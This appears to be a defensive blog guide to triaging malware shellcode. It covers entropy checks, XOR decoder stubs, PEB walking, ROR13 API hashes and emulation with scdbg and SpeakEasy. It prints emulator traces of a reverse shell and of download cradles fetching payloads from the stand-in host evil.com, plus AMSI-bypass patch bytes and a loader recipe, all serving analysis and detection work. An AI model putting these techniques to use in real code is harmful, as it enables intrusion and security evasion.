Shellcode Analysis: Tips, Tricks & Common Patterns

A practical guide to analyzing shellcode - identifying encoders, emulation, and recognizing common patterns. Covers triage, PEB walking, hash-based API resolution, scdbg/SpeakEasy emulation, and family-level pattern recognition.

Why Shellcode Analysis Matters

Most modern malware delivery is staged. The first thing that lands on the victim is rarely a full PE - it’s a small position-independent payload (shellcode) whose only job is to bootstrap whatever comes next: download a DLL, reflectively load a beacon, hollow a process, or stage credential theft. From a triage perspective, shellcode is where the campaign’s intent first appears. Decoding even 200 bytes of shellcode often reveals the actor’s tradecraft, the second-stage URL, and the choice of C2 framework before any expensive sandbox detonation.

This post collects the patterns I look for during shellcode triage, the tooling I reach for first, and the common shapes that recur across families.

Quick Triage

Check file entropy: 5.0-6.5 suggests encoded, 7.0+ means encrypted. Disassemble with ndisasm for x86/x64.

First-Pass Tooling

# Entropy & file shape
ent shellcode.bin
binwalk -E shellcode.bin           # entropy plot
binwalk shellcode.bin              # bundled file scanner

# Disassembly
ndisasm -b 64 shellcode.bin | head
ndisasm -b 32 shellcode.bin | head
rasm2 -a x86 -b 64 -d -f shellcode.bin   # radare2's disassembler

# Strings (post-decode)
strings -a -n 6 shellcode.bin
strings -el shellcode.bin                # little-endian wide strings (UTF-16LE)

# Hash-based identification
sha256sum shellcode.bin
ssdeep shellcode.bin                     # fuzzy hashing for variant clustering

Entropy Heuristics

Entropy Interpretation
0.0 - 1.5 Mostly null bytes / fixed pattern - probably padding
1.5 - 4.5 Plain x86/x64 instructions - directly disassemblable
4.5 - 6.5 Encoded (XOR, alphanumeric, single-pass transform)
6.5 - 7.5 Compressed (LZ, RLE) or weakly encrypted
7.5 - 8.0 Strong encryption (AES, RC4 with random key)

Whole-file entropy can mislead - the decoder stub at the start is plain code (low entropy) followed by an encrypted body (high entropy), and the average lands in the encoded range. Always look at windowed entropy (first 64 bytes vs. rest of the file).

Architecture Tells

Disassembling first as x64, then as x86, lets you eyeball which one looks like sane instructions:

  • x64: lots of mov rax, ..., add rsp, ..., 48 ... REX-prefixed bytes.
  • x86: lots of mov eax, ..., push ebp; mov ebp, esp prologues.
  • ARM64: STP X29, X30, [SP, ...] style prologues, no REX bytes.

If neither disassembly looks sensible, you’re looking at encoded data - find the decoder stub.

Common Patterns

Look for PEB walking (API resolution), hash-based function lookup (ROR13 for Metasploit), and XOR decoder stubs at the start.

XOR Decoder Stub

The simplest shellcode encoders prepend a 5-15 byte loop that walks the body byte by byte XORing with a fixed key, then jumps to the start of the decoded region. The pattern is unmistakable:

0000  EB 0E              jmp short loc_10
0002 loc_2:
0002  5E                 pop rsi              ; rsi = encoded body
0003  31 C9              xor ecx, ecx
0005  B1 87              mov cl, 0x87         ; encoded length
0007  80 36 AA           xor byte ptr [rsi], 0xAA   ; XOR key
000A  46                 inc rsi
000B  E2 FA              loop short loc_7
000D  EB 05              jmp short loc_14
000F loc_10:
000F  E8 EE FF FF FF     call loc_2
0014 loc_14:
... encoded body ...

The “call/pop” trick is the position-independent way to learn the address of the encoded body. After the loop, control transfers into the decoded code. Once you spot the structure, the XOR key (0xAA here) and length (0x87) are static parameters - apply them in CyberChef or a 3-line Python script and disassemble the result.

Common alphanumeric encoders (Metasploit’s x86/alpha_mixed) use multi-pass transforms producing only printable ASCII bytes - they’re characterised by long runs of [A-Za-z0-9] at the start of the file with a tiny constructor at the very beginning.

PEB Walking (API Resolution)

Shellcode cannot import anything by name - there’s no PE loader to fix up imports. Instead, it walks the Process Environment Block to find loaded modules. The structure on x64:

GS:[0x60]      → PEB
PEB.Ldr        → PEB_LDR_DATA
PEB.Ldr.InMemoryOrderModuleList  → linked list of LDR_DATA_TABLE_ENTRY
                                    (one per loaded DLL)

LDR_DATA_TABLE_ENTRY:
    +0x000 InLoadOrderLinks       (LIST_ENTRY)
    +0x010 InMemoryOrderLinks     (LIST_ENTRY)
    +0x020 InInitializationOrderLinks
    +0x030 DllBase
    +0x048 BaseDllName            (UNICODE_STRING)

The recognisable assembly:

mov rdx, gs:[0x60]              ; PEB
mov rdx, [rdx + 0x18]           ; PEB.Ldr
mov rdx, [rdx + 0x20]           ; InMemoryOrderModuleList head
                                ; (next: walk LIST_ENTRY pointers, cmp BaseDllName)

x86 equivalent uses FS:[0x30] and offsets 0x0C, 0x14. Once you see FS:[0x30] or GS:[0x60] in the first few instructions, you’re looking at PEB walking - that’s API resolution.

Hash-Based Function Lookup (ROR13)

After locating kernel32.dll’s base, the shellcode walks the export directory comparing API name hashes (not strings - hardcoded strings would be a YARA bonanza) against pre-computed constants.

The Metasploit block_api.asm family uses ROR-13:

mov edi, [rsi + 0x20]      ; AddressOfNames
...
xor eax, eax
loop_byte:
    movzx edx, byte ptr [esi]
    cmp dl, dh                 ; end of string?
    jz hash_done
    ror eax, 13                ; rotate-right by 13
    add eax, edx
    inc esi
    jmp loop_byte
hash_done:

Recognisable hashes:

Hash API
0x0726774C LoadLibraryA
0x7C0017A5 GetProcAddress
0xE553A458 VirtualAlloc
0x6A18AD03 WSASocketA
0x6174A599 WSAStartup
0xE0DF0FEA connect
0x79CC3F69 CreateProcessA

A grep through the .data section for any of these magic 4-byte values immediately tells you the shellcode’s planned API set. Other families use FNV-1a, djb2, or custom polynomial hashes - the principle is identical, just with different constants.

EGGHUNTER / Tag-Search Shellcode

A 30-40 byte stub that scans process memory for a 4-byte tag (e.g. w00tw00t repeated twice) and jumps to whatever follows it. Used when the initial buffer is too small for full code but a larger buffer was placed elsewhere in the process. Recognisable by NtAccessCheckAndAuditAlarm (the syscall used by Skape’s classic egghunter to validate readable memory).

Stack Strings

Even after API hashing, shellcode needs to push a few literal strings (e.g. URLs, registry keys). They show up as repeated mov dword ptr [rsp+...], 0xCONSTANT sequences building a string on the stack one DWORD at a time:

mov dword [rsp+0x00], 0x70747468   ; "http"
mov dword [rsp+0x04], 0x2F2F3A73   ; "s://"
...

Concatenate the constants, byte-swap each, and you have the raw string.

Dynamic Analysis

Use scdbg to emulate execution and hook API calls - immediately reveals reverse shells, download cradles, and process injection.

scdbg

scdbg (David Zimmer) is the workhorse for x86 shellcode emulation:

scdbg /f shellcode.bin
# 401029  LoadLibraryA(WS2_32)
# 40103D  WSAStartup(MAKEWORD(2,2),0x4011a0)
# 40104B  WSASocketA(2,1,0,0,0,0)
# 401059  connect(192.168.1.50:4444) = -1 (no real network)
# 401067  CreateProcessA(cmd.exe)
# Stepcount 247

Within seconds you have the C2 host, port, and capability summary. Useful flags:

  • /findsc to scan a buffer for likely shellcode entry points.
  • /api to specify which API hooks to apply.
  • /foff <hex> to start emulation from a specific offset (skip the decoder if you’ve already extracted the body).

scdbg is x86-only. For x64 use SpeakEasy (Mandiant), which emulates both.

SpeakEasy

speakeasy -t shellcode.bin -a x64 -r
# 0x10000000  VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) → 0x10001000
# 0x10000020  InternetOpenA("Mozilla/5.0...")
# 0x10000040  InternetConnectA("evil.com",443,...)
# 0x10000080  HttpOpenRequestA(GET, "/payload.bin")
# 0x100000a0  HttpSendRequestA(...)

SpeakEasy’s strengths are x64 support, a more complete Windows API surface, and a Python plugin model for extending coverage.

Unicorn / Qiling

For non-Windows shellcode (Linux, BSD) or for very custom analysis (replacing API stubs with your own logic), Unicorn and Qiling provide programmatic CPU emulation:

from qiling import Qiling
ql = Qiling(["./shellcode.bin"], "rootfs/x86_windows", verbose=4)
ql.os.heap.start_address = 0x10000000
ql.run()

You can replay any Win32 / POSIX environment, hook arbitrary instructions, and dump memory at chosen breakpoints.

Live Debugger Approach

For complex shellcode that an emulator can’t handle (heavy SEH usage, syscalls, in-line mov cr3 style anti-emulation tricks):

  1. Compile a minimal loader.c that VirtualAllocs RWX memory, copies the shellcode in, and __debugbreak() before calling.
  2. Run under x64dbg / WinDbg, hit the breakpoint, attach.
  3. Single-step through the shellcode in the real Windows environment.

This is slower than emulation but defeats every anti-emulation trick because you’re running on a real CPU with a real kernel.

Decoder/Transform Catalogue

Pattern Indicator
Reverse shell WSASocketA → connect → CreateProcessA
Download & exec URLDownloadToFileA chain
Reflective DLL VirtualAlloc → manual PE loading
Process injection OpenProcess → VirtualAllocEx → WriteProcessMemory

Adding the most common families I see in 2025-2026 samples:

Pattern Recognisable API chain
Reverse TCP shell WSAStartupWSASocketAconnectCreateProcessA(cmd.exe) with redirected STARTUPINFO
Bind shell WSAStartupbindlistenacceptCreateProcessA
HTTP/S download cradle LoadLibraryA(wininet)InternetOpenAInternetConnectAHttpOpenRequestAHttpSendRequestAInternetReadFile
Reflective DLL loader VirtualAlloc(RW) → custom loader walks PE → VirtualProtect(RX) → indirect call
Process hollowing CreateProcessA(...,CREATE_SUSPENDED)NtUnmapViewOfSectionVirtualAllocExWriteProcessMemorySetThreadContextResumeThread
Process injection (classic) OpenProcessVirtualAllocExWriteProcessMemoryCreateRemoteThread
AMSI bypass shellcode GetProcAddress(amsi.dll, AmsiScanBuffer)VirtualProtect → patch entry to mov eax, 0x80070057; ret
ETW patch GetProcAddress(ntdll, EtwEventWrite)VirtualProtect → patch ret
Direct/indirect syscall stubs mov rax, <SSN>; mov r10, rcx; syscall; ret (direct) or mov r11, <NtFunc+0x12>; call r11 (indirect)
Cobalt Strike stage 0 RC4-decrypted body of ~256 KB; LoadLibraryA(wininet) + checksum 0xC691A8FB-style hashes

A Quick Worked Example

A 312-byte sample lands on your desk. First-pass scdbg run:

scdbg /f sample.bin
401000  GetProcAddress(0x77E80000, "LoadLibraryA")
401016  GetProcAddress(0x77E80000, "GetProcAddress")
40102C  LoadLibraryA(WININET)
401040  GetProcAddress(WININET, "InternetOpenA")
401055  GetProcAddress(WININET, "InternetConnectA")
40106A  GetProcAddress(WININET, "HttpOpenRequestA")
401080  GetProcAddress(WININET, "HttpSendRequestA")
401096  GetProcAddress(WININET, "InternetReadFile")
4010A2  InternetOpenA("Mozilla/5.0 (Windows NT 10.0)")
4010BC  InternetConnectA("evil.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP)
4010D8  HttpOpenRequestA(hConnect, "GET", "/u.bin")
...

Triage verdict in under a minute: HTTPS download cradle pulling a second stage from evil.com:443/u.bin. That single URL becomes the next IOC; pivot in passive DNS / VirusTotal / URLScan to find the campaign perimeter.

Practical Workflow Checklist

A repeatable triage that finishes most samples in 30 minutes:

  1. Hash + classify. SHA-256 → VT lookup → first-seen, family hits.
  2. Entropy + windowed entropy. Locate decoder vs body boundary.
  3. First instructions disassembly. PE/PEB walk? Hash lookup? Decoder stub?
  4. Emulate (scdbg/SpeakEasy). Capture API trace.
  5. Decode + re-disassemble if there was a decoder stub.
  6. Identify family / framework. Metasploit? Cobalt Strike? Sliver? Custom?
  7. Extract IOCs. URLs, hostnames, ports, mutex names, file paths.
  8. Author detections. YARA on invariant bytes (hash constants, decoder shape); Sigma on the host-side spawn pattern.

Shellcode is rarely the whole attack - it’s the bridge. But the bridge always reveals the destination. Spend 15 minutes on the shellcode and you’ll often save hours of sandbox-driven black-box analysis.

← Home More Malware analysis →